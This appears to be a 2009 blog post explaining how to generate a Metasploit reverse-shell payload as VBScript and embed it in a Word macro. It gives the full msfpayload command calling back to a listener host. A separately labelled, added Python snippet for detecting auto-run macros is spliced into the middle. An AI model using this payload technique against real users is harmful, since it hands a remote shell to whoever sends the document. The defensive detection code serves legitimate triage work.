A few days ago, I saw this small video posted by John Strand from PSW about the V option in msfpayload and the EXE2VBS tool. As always, his videos are extremely interesting (although he does talk pretty fast in this one). Pauldotcom Ep 161
So basically this is a client-side attack, and in my opinion a pretty nasty one too. Every time I've seen someone open a Word document or Excel spreadsheet, either downloaded off the Web or received via e-mail, 99% of the time people either let the macros run or already have the security settings set to low.
What does this mean? Well, using the "V" option in msfpayload will output the payload as VBScript. Then all one needs to do is insert it in a Word document. Once the file is opened, the payload is executed (provided the macro runs, of course).
I've actually tried it, and it's pretty funny (and scary) getting a reverse shell because I opened a Word document.
So here's a quick example of the syntax. If you are not familiar with Metasploit, I suggest you visit their site.
From your machine with the Metasploit framework installed:
bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST=10.1.10.53 V > /tmp/vbrshell.bas
Once the file is created, just insert that in a nice Word document.
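Because the payload only fires when an auto-run macro executes, macro source can be triaged before a document reaches a user. The following is an added example, not code from the original post or from Metasploit: it flags macro text that pairs an auto-run entry point with file-write or process-launch statements. The function names, verdict labels and both sample macros are constructed for illustration, and the keyword heuristics are an assumption about what is worth flagging, not a complete scanner.

```python
import re

# Procedures Office runs by itself when a document or workbook is opened.
AUTO_EXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(AutoOpen|Auto_Open|AutoExec|Document_Open|Workbook_Open)\b", re.I | re.M)

# Statements that let macro code write a file or start a process.
BEHAVIOURS = {
    "file_write": re.compile(r"\b(?:Put|Print|Write)\s+#", re.I),
    "object_creation": re.compile(r"\b(?:CreateObject|GetObject)\s*\(", re.I),
    "process_launch": re.compile(r"\bShell(?:Execute)?\b", re.I),
}

def strip_comments(source):
    """Remove VBA comments so commented-out code is not flagged."""
    kept = []
    for line in source.splitlines():
        if re.match(r"\s*Rem\b", line, re.I):
            continue
        in_string = False
        for i, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                line = line[:i]  # cut at the first apostrophe outside a string
                break
        kept.append(line)
    return "\n".join(kept)

def triage(source):
    """Return auto-run entry points, behaviours seen, and a verdict."""
    code = strip_comments(source)
    entry_points = sorted({m.group(1) for m in AUTO_EXEC.finditer(code)}, key=str.lower)
    behaviours = sorted(name for name, rx in BEHAVIOURS.items() if rx.search(code))
    if entry_points and "process_launch" in behaviours:
        verdict = "block"    # runs on open and starts a process
    else:
        verdict = "review" if entry_points or behaviours else "allow"
    return {"entry_points": entry_points, "behaviours": behaviours, "verdict": verdict}

# Constructed samples (hypothetical macro text, not real msfpayload output).
SUSPICIOUS = ("Sub AutoOpen()\n  Drop\nEnd Sub\nSub Workbook_Open()\n  Drop\nEnd Sub\n"
              "Sub Drop()\n  Open p For Binary As #1\n  Put #1, , b\n  Close #1\n"
              "  Shell p, vbHide ' launch the written file\nEnd Sub\n")
BENIGN = ("Sub FormatReport()\n  ' Shell \"cmd\" appears only in this comment\n"
          "  Selection.Font.Bold = True\nEnd Sub\n")
```

Calling `triage(SUSPICIOUS)` returns the entry points and behaviours that drove the verdict, which is the detail an analyst needs when deciding whether to quarantine the attachment.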
Here's another video posted by Mark Baggett which explains the process.
Have fun, and remember to only use this on your local network or with permission of the person to whom you'll be sending such a file.
Saturday, August 1, 2009